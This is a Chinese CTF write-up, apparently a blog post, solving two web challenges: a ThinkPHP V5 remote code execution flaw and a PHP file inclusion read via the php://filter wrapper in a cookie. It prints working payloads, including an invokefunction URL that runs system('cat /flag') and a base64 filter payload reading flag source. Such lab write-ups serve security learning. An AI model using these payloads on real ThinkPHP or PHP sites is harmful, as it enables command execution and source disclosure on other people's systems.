攻防世界-Web题目1(ThinkPHP V5框架漏洞、php伪协议)

目录

php_rce

1、题目

2、知识点

3、思路

fileinclude

4、题目

5、知识点

6、思路


php_rce

1、题目

2、知识点

ThinkPHP V5的框架漏洞

3、思路

打开题目,出现了一个框架,之前做过类似的题目

NSSCTF-Web题目7(ThinkPHP V5 框架漏洞)-CSDN博客

可以直接百度这个框架的利用漏洞,可以参考上面的链接

利用poc如下:

url+?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统执行命令

61.147.171.105:62936/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

得到flag:flag{thinkphp5_rce}


fileinclude

4、题目

5、知识点

php伪协议

6、思路

这里存在flag.php页面,直接访问没有内容,很多可能需要用到php伪协议来读取,那没有参数可以上传怎么办?

右键查看源代码

发现了源代码

代码的意思:$lan变量等于上传的cookie值,如果cookie值不等于english,则执行include($lan.".php"),有include函数我们可以利用php的伪协议

php://filter使用

php://filter/read=convert.base64-encode/resource=[文件名]

payload:language=php://filter/read=convert.base64-encode/resource=/var/www/html/flag

使用hackbar上传cookie值

使用base64解密:

Base64 编码/解码 - 锤子在线工具 (toolhelper.cn)

得到flag:cyberpeace{e19623df5651cd42ede812cc2f0f3fd9}


这篇文章就先写到这里了,哪里不懂的或者哪里不足的欢迎指出

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-19 07:42:02       101 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-19 07:42:02       109 阅读
  3. 在Django里面运行非项目文件

    2024-07-19 07:42:02       87 阅读
  4. Python语言-面向对象

    2024-07-19 07:42:02       96 阅读

热门阅读

  1. STM32 | 看门狗+RTC源码解析

    2024-07-19 07:42:02       24 阅读
  2. 富文本中提取信息并去除其中的HTML或XML标签

    2024-07-19 07:42:02       26 阅读
  3. 2024前端面试真题【手写篇】

    2024-07-19 07:42:02       20 阅读
  4. 聊聊最近在看的一本书-《从极简到极致》

    2024-07-19 07:42:02       23 阅读
  5. Python数据获取(网页视频、音频版)

    2024-07-19 07:42:02       26 阅读
  6. Log4j2原理及应用详解(九)

    2024-07-19 07:42:02       25 阅读
  7. 关于Kafka的17个问题

    2024-07-19 07:42:02       22 阅读
  8. Leetcode 392. 判断子序列

    2024-07-19 07:42:02       23 阅读
  9. 无重复字符的最长子串(leetcode)

    2024-07-19 07:42:02       26 阅读
  10. 基于深度学习的超分辨率

    2024-07-19 07:42:02       25 阅读
  11. redis优化场景之批量处理

    2024-07-19 07:42:02       23 阅读
  12. SQL注入漏洞

    2024-07-19 07:42:02       23 阅读